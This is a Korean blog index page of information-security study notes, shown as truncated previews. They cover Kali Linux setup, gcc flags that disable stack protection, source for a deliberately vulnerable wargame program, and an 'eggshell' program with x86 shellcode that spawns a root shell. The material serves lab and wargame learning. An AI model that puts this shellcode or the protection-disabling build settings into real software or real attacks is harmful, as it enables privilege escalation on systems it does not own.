본문 바로가기

정보보안80

정보보안4 1차시 https://cafe.naver.com/linuxmasternet/32139칼리 리눅스 설치https://www.kali.org/get-kali/#kali-virtual-machines다운로드 : virtual-machines의 VMware 기본 로그인 계정은 kali kali 기본셋팅 기본쉘을 Z쉘에서 /bin/bash로 변경 (자동완성 기능이 불편해서 편의상 변경) 포트 확인   시간대 변경첫 시작시 미국기준 시각이 셋팅되어 있음timedatectl로 list-timezones에서 Seoul 찾고timedatectl의 set-timezones에 Asia/Seoul 설정date를 다시 쳐보면 KST 로 변경되어 있음 한글설정apt -y update apt -y upgrade apt-get -y ins.. 2024. 6. 29.
정보보안3 8차시 컴파일할 때 메모리(스택)에서 코드가 실행될 수 있도록 메모리 보호옵션을 해제-fno-stack-protector: 스택 프로텍터 제거 옵션 -z execstack: 스택에 올라가 있는 기계어 코드를 실행하는 옵션 -mpreferred-stack-boundary=2: 함수들의 스택프레임에서 가장 낮은 주소가 2^N 에 배수가 되도록 align 하는 옵션 alias gcc='gcc -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack'편의성을 위해 alias에 추가해둠 실행환경은 Centos7 보안때문에 낮은버전으로 선택 -static로 컴파일 하기 위해 yum -y install gcc glibc-static glibc-static.i686 설치.. 2024. 6. 23.
정보보안3 7차시 boforc 사용자의 wolfman 문제 egghunter + buffer hunter#include  #include  extern char **environ; main(int argc, char *argv[]) {         char buffer[40];         int i;        if(argc                 printf("argv error\n");                 exit(0);         }        // egghunter         for(i=0; environ[i]; i++){                memset(environ[i], 0, strlen(environ[i]));         }        if(argv[1][47] !.. 2024. 6. 22.
eggshell 추후 분석 vi eggshell.c #include  #include  #include  #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80" //setuid(geteuid()) "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\.. 2024. 6. 22.